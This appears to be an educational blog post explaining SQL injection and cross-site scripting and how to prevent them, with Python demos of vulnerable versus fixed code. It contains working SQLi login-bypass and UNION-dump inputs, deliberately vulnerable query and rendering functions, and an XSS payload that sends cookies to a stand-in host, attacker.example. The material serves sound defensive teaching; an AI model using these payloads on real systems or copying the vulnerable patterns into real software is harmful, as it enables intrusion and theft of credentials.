Cross-Site Scripting (XSS) and SQL Injection Attacks (SQLi) – what’s the difference?


It’s been a while since I focused on an aspect of cyber security, so this week I want to briefly cover two types of cyber attack that are often closely associated and sometimes mistaken for the same attack…

Firstly, let’s think about SQL Injection attacks (SQLi). With SQLi the hacker’s target is the application’s database, so the attack is aimed at organisations rather than individual end users. The hacker looks for a website that builds its SQL queries out of user input (a login form, a search box, a URL parameter) without keeping that input separate from the query itself. Instead of a real username or password, they type in text that contains SQL syntax. Because the application glues that text straight into its query string, the database cannot tell the hacker’s SQL from the application’s own and simply executes it. Depending on what the application’s database account is allowed to do, the hacker can then bypass the login, read other users’ records, alter or delete data, and effectively become an unwanted administrator of the organisation’s valuable or sensitive information.

So what are the best practices to avoid SQLi?

Firstly, use parameterised statements (also called prepared statements). This is the most important defence against SQLi: the query text is fixed and contains placeholders, and the user’s input is sent to the database separately as data, so it is compared literally and can never be interpreted as SQL, whatever it contains. Do not build queries by concatenating strings; once the hacker’s text is part of the query they can rewrite the query at will. Secondly, encrypt data at rest and in transit. Be clear about what this buys you: it makes stolen backups and intercepted traffic useless to an attacker, but it does not stop SQLi itself, because the application decrypts the data in order to query it. Thirdly, and perhaps most obviously, follow the principle of least privilege, especially for the account the application uses to talk to the database. If that account can only read the tables it actually needs, an injection that does get through cannot drop tables or alter data, and the fewer people and systems holding database credentials, the fewer entry points there are to exploit. Validating input (rejecting anything that is not the expected shape, such as a non-numeric ID) is a useful extra layer, but it is no substitute for parameterisation.
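To make the difference between string concatenation and a parameterised statement concrete, here is an added example that is not code from the original post. It uses Python’s built-in sqlite3 module against a constructed in-memory users table: a login check built by concatenation is bypassed with a crafted username, the same flaw is used to read other users’ data with a UNION clause, and the parameterised version of the check is given the identical inputs and rejects them. Passwords are stored in plain text here purely to keep the example short; a real system stores salted password hashes.

```python
import sqlite3

# Constructed sample data: two users in an in-memory database.
# Plain-text passwords are used only to keep the example short;
# a real application stores salted password hashes.
SAMPLE_USERS = [("alice", "correct horse"), ("bob", "hunter2")]


def make_db():
    """Create an in-memory SQLite database with a small users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Login check built by string concatenation.

    Whatever the user typed becomes part of the SQL text, so quotes,
    comment markers (--) and UNION clauses are parsed by the database.
    Returns the matched username, or None if the login failed.
    """
    query = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """The same check using a parameterised statement.

    The SQL text is fixed; the driver hands username and password to the
    database as values, so they are compared literally and never parsed.
    """
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# Attacker-chosen inputs, constructed for this example.
# Closes the quoted string and comments out the password check:
BYPASS_USERNAME = "alice' --"
# Closes the string and appends a second query that returns passwords:
DUMP_USERNAME = "x' UNION SELECT password FROM users --"


def demo():
    """Run the same inputs through both versions and return the outcomes."""
    conn = make_db()
    return {
        "vuln_bypass": login_vulnerable(conn, BYPASS_USERNAME, "wrong"),
        "vuln_dump": login_vulnerable(conn, DUMP_USERNAME, "wrong"),
        "safe_bypass": login_safe(conn, BYPASS_USERNAME, "wrong"),
        "safe_dump": login_safe(conn, DUMP_USERNAME, "wrong"),
        "safe_real": login_safe(conn, "alice", "correct horse"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result!r}")
```

Running it, the vulnerable version logs the attacker in as alice with a wrong password and, with the UNION input, hands back a stored password instead of a username; the parameterised version returns None for both crafted inputs and only succeeds for the genuine credentials.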

Moving on to Cross-site scripting…

With XSS, the hacker’s target is the end user rather than the organisation, because the attack runs on the client side, in the victim’s browser, rather than at the database. The hacker finds a page that puts user-supplied text (a comment, a profile name, a search term echoed back in the results) into its HTML without encoding it, and submits text containing JavaScript. If the site stores that text, every visitor who later views the page receives the script (stored XSS); if the site only reflects it back from a URL parameter, the hacker has to trick the victim into following a crafted link (reflected XSS). Either way the script arrives from the trusted site’s own origin, so the browser runs it with full access to that site’s page, and it can quietly send the user’s session cookies or authentication tokens to the hacker, perform actions as the user, or rewrite the page to capture credentials.

How to protect against XSS:

For XSS, the number one defence is output encoding: every piece of untrusted data must be encoded for the context it lands in before it is written into the page, so that a less-than sign in a comment becomes the HTML entity for that character and is displayed rather than treated as the start of a tag. Modern templating engines do this automatically as long as you do not switch it off. Back this up with a Content-Security-Policy response header, which tells the browser which script sources it may run and blocks inline scripts, and mark session cookies HttpOnly so that even a script that does get through cannot read them. A web application firewall (WAF) is a useful extra layer for both XSS and SQLi: it inspects HTTP and HTTPS requests and blocks those that look like known attack payloads, and it can buy time while a flaw is fixed. But a WAF only matches patterns, and attackers routinely find encodings that slip past it, so it is a safety net in front of your database and end users, not a substitute for fixing the application.
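As an added example (not code from the original post), the following Python shows the attack and the defence side by side: a comment page rendered with raw string substitution, the same page rendered with html.escape so the payloads are displayed as text, and the Content-Security-Policy and HttpOnly cookie headers that limit the damage if an encoding is ever missed. The two payloads and the attacker host attacker.example are constructed for the example, and the security_headers function is an illustrative design, not a library API.

```python
import html

# Constructed attacker input: a comment that tries to send the visitor's
# cookies to a hypothetical attacker-controlled host (attacker.example).
STOLEN_COOKIE_PAYLOAD = (
    "Nice post!<script>new Image().src="
    "'https://attacker.example/c?'+document.cookie</script>"
)
# Constructed attacker input aimed at an attribute context: closes the
# double-quoted attribute and adds an event handler.
ATTRIBUTE_PAYLOAD = 'x" onmouseover="alert(document.cookie)'

# Two untrusted values land in two different HTML contexts:
# an attribute value (author) and element text (body).
PAGE_TEMPLATE = (
    "<html><body>\n"
    '<div class="comment" data-author="{author}">{body}</div>\n'
    "</body></html>"
)


def render_comment_vulnerable(author, body):
    """Writes user text straight into the HTML.

    Anything that looks like markup (tags, quotes, event handlers) is
    handed to the browser as code rather than as text.
    """
    return PAGE_TEMPLATE.format(author=author, body=body)


def render_comment_safe(author, body):
    """HTML-encodes each untrusted value before it is written into the page.

    quote=True also encodes double and single quotes, so the value cannot
    close the data-author attribute and smuggle in an event handler.
    """
    return PAGE_TEMPLATE.format(
        author=html.escape(author, quote=True),
        body=html.escape(body, quote=True),
    )


def security_headers(session_id):
    """Defence-in-depth response headers to send with the page.

    The CSP allows scripts only from the site's own origin, which blocks
    inline <script> blocks and inline event handlers even if an encoding
    is missed. HttpOnly keeps the session cookie out of document.cookie,
    so a script that does run cannot read it.
    """
    return {
        "Content-Security-Policy": (
            "default-src 'self'; script-src 'self'; object-src 'none'"
        ),
        "Set-Cookie": f"session={session_id}; HttpOnly; Secure; SameSite=Lax",
    }


def contains_executable_markup(page):
    """Crude check for the demo: is there still a raw <script> tag or an
    un-encoded onmouseover handler in the rendered HTML?"""
    return "<script>" in page or ' onmouseover="' in page


if __name__ == "__main__":
    for label, author, body in [
        ("script in body", "eve", STOLEN_COOKIE_PAYLOAD),
        ("handler in attribute", ATTRIBUTE_PAYLOAD, "hi"),
    ]:
        print(label, "vulnerable:",
              contains_executable_markup(render_comment_vulnerable(author, body)))
        print(label, "safe:",
              contains_executable_markup(render_comment_safe(author, body)))
    print(security_headers("abc123"))
```

The point of the two payloads is that one encoding step is not enough on its own: the script tag in the comment body is neutralised by escaping the angle brackets, but the attribute payload never uses an angle bracket at all and only fails because quotes are encoded too. That is why encoding has to match the context the data is written into, and why the headers are worth sending as a second line of defence.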

To conclude, cyber attacks are multifaceted and continually increasing in sophistication. As we have seen from examining XSS and SQLi, attacks can be both aggressive and invasive yet initially go unnoticed, hiding behind trusted sites and recognised means of authentication. Secure design is a critical, ongoing process, employing multiple precautions and layers of defence rather than relying on any single control.

I hope I have given you a comprehensive introduction to XSS and SQLi and the means of preventing them. Look out for more of my blogs, aiming to provide concise and understandable introductions to many aspects of cyber and the cloud!